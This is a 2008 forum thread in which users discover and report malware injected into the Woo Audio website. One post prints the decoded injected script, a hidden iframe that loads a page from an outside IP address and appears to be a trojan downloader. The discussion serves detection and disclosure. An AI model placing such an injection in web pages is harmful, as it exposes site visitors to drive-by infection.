Woo Audio site - Compromised?
Mar 30, 2008 at 11:12 AM Thread Starter Post #1 of 21

DoubleEs

500+ Head-Fier
Joined
Mar 9, 2006
Posts
683
Likes
10
Hi

Not sure if this is the right place to post this but has anyone been to the Woo Audio site lately?

The reason I'm asking is because for the last few days my AV have been going nuts everytime I try to go there.

My AV (Kaspersky) throws up an alert saying Trojan_Downloader.HTML.Agent.ij detected and block me from going there.

I have several PCs here but they're all running Kaspersky so I don't know if it's a false positive.

Has any of you guys been to the WA site in the past few days running a different AV and not getting any alert?
 
Mar 30, 2008 at 11:42 AM Post #2 of 21
Might be. If you look at the page source code, there's some kind of script added after the end html tag that could be a virus of some kind.
 
Mar 30, 2008 at 12:04 PM Post #3 of 21
after unescaping the string the following is the result:

Code:

Code:
[left]window.status='Done';document.write('<iframe name=7f046febc98 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*182972)+'84e1e\' width=307 height=596 style=\'display: none\'></iframe>')[/left]

looks like it creates an iframe on the page that references the site 58.65.232.33; I'd say it's highly likely that Woo Audio has no idea that this was added to their site, and that it's a trojan
frown.gif
 
Mar 30, 2008 at 12:07 PM Post #4 of 21
Update: I found a decoder and the script at the bottom of all their pages contains an iframe that loads another site, presumably that contained a virus or trojan of some kind. The page that was loaded is now gone. I've sent a message using the woo audio contact page about it. Possibly the server hosting the site was compromised.

Edit: Nebby beat me to it.
 
Mar 30, 2008 at 12:20 PM Post #6 of 21
Well Currawong, I beat you to the forum post, but you beat me to the email to them
tongue.gif


Btw, hello fellow Japan Head-fi'er! Shame you're on the other end of the country
frown.gif
 
Mar 31, 2008 at 1:14 AM Post #9 of 21
Yeah, Macs rule!! :6)
 
Mar 31, 2008 at 3:15 AM Post #12 of 21
Not sure where the hell you got this message from but I was right now on the Woo site and browsed all pages with no problems, and I have a PC, with NOD32, and no problems at all...
 
Mar 31, 2008 at 3:33 AM Post #13 of 21
Quote:

Originally Posted by Sovkiller /img/forum/go_quote.gif
Not sure where the hell you got this message from but I was right now on the Woo site and browsed all pages with no problems, and I have a PC, with NOD32, and no problems at all...


The questionable line of code has already been removed from their site.
 
Mar 31, 2008 at 3:39 AM Post #14 of 21
Thanks God!!! Good to know!!!
 
Mar 31, 2008 at 3:43 AM Post #15 of 21
Scary stuff, I've also been browsing wooaudio within the past week or so and I didn't get any anti-virus pop ups (running AVG here). I'm using firefox with the noscript extension though, maybe that would've prevented the code from being run in the first place?
 

Users who are viewing this thread

Back
Top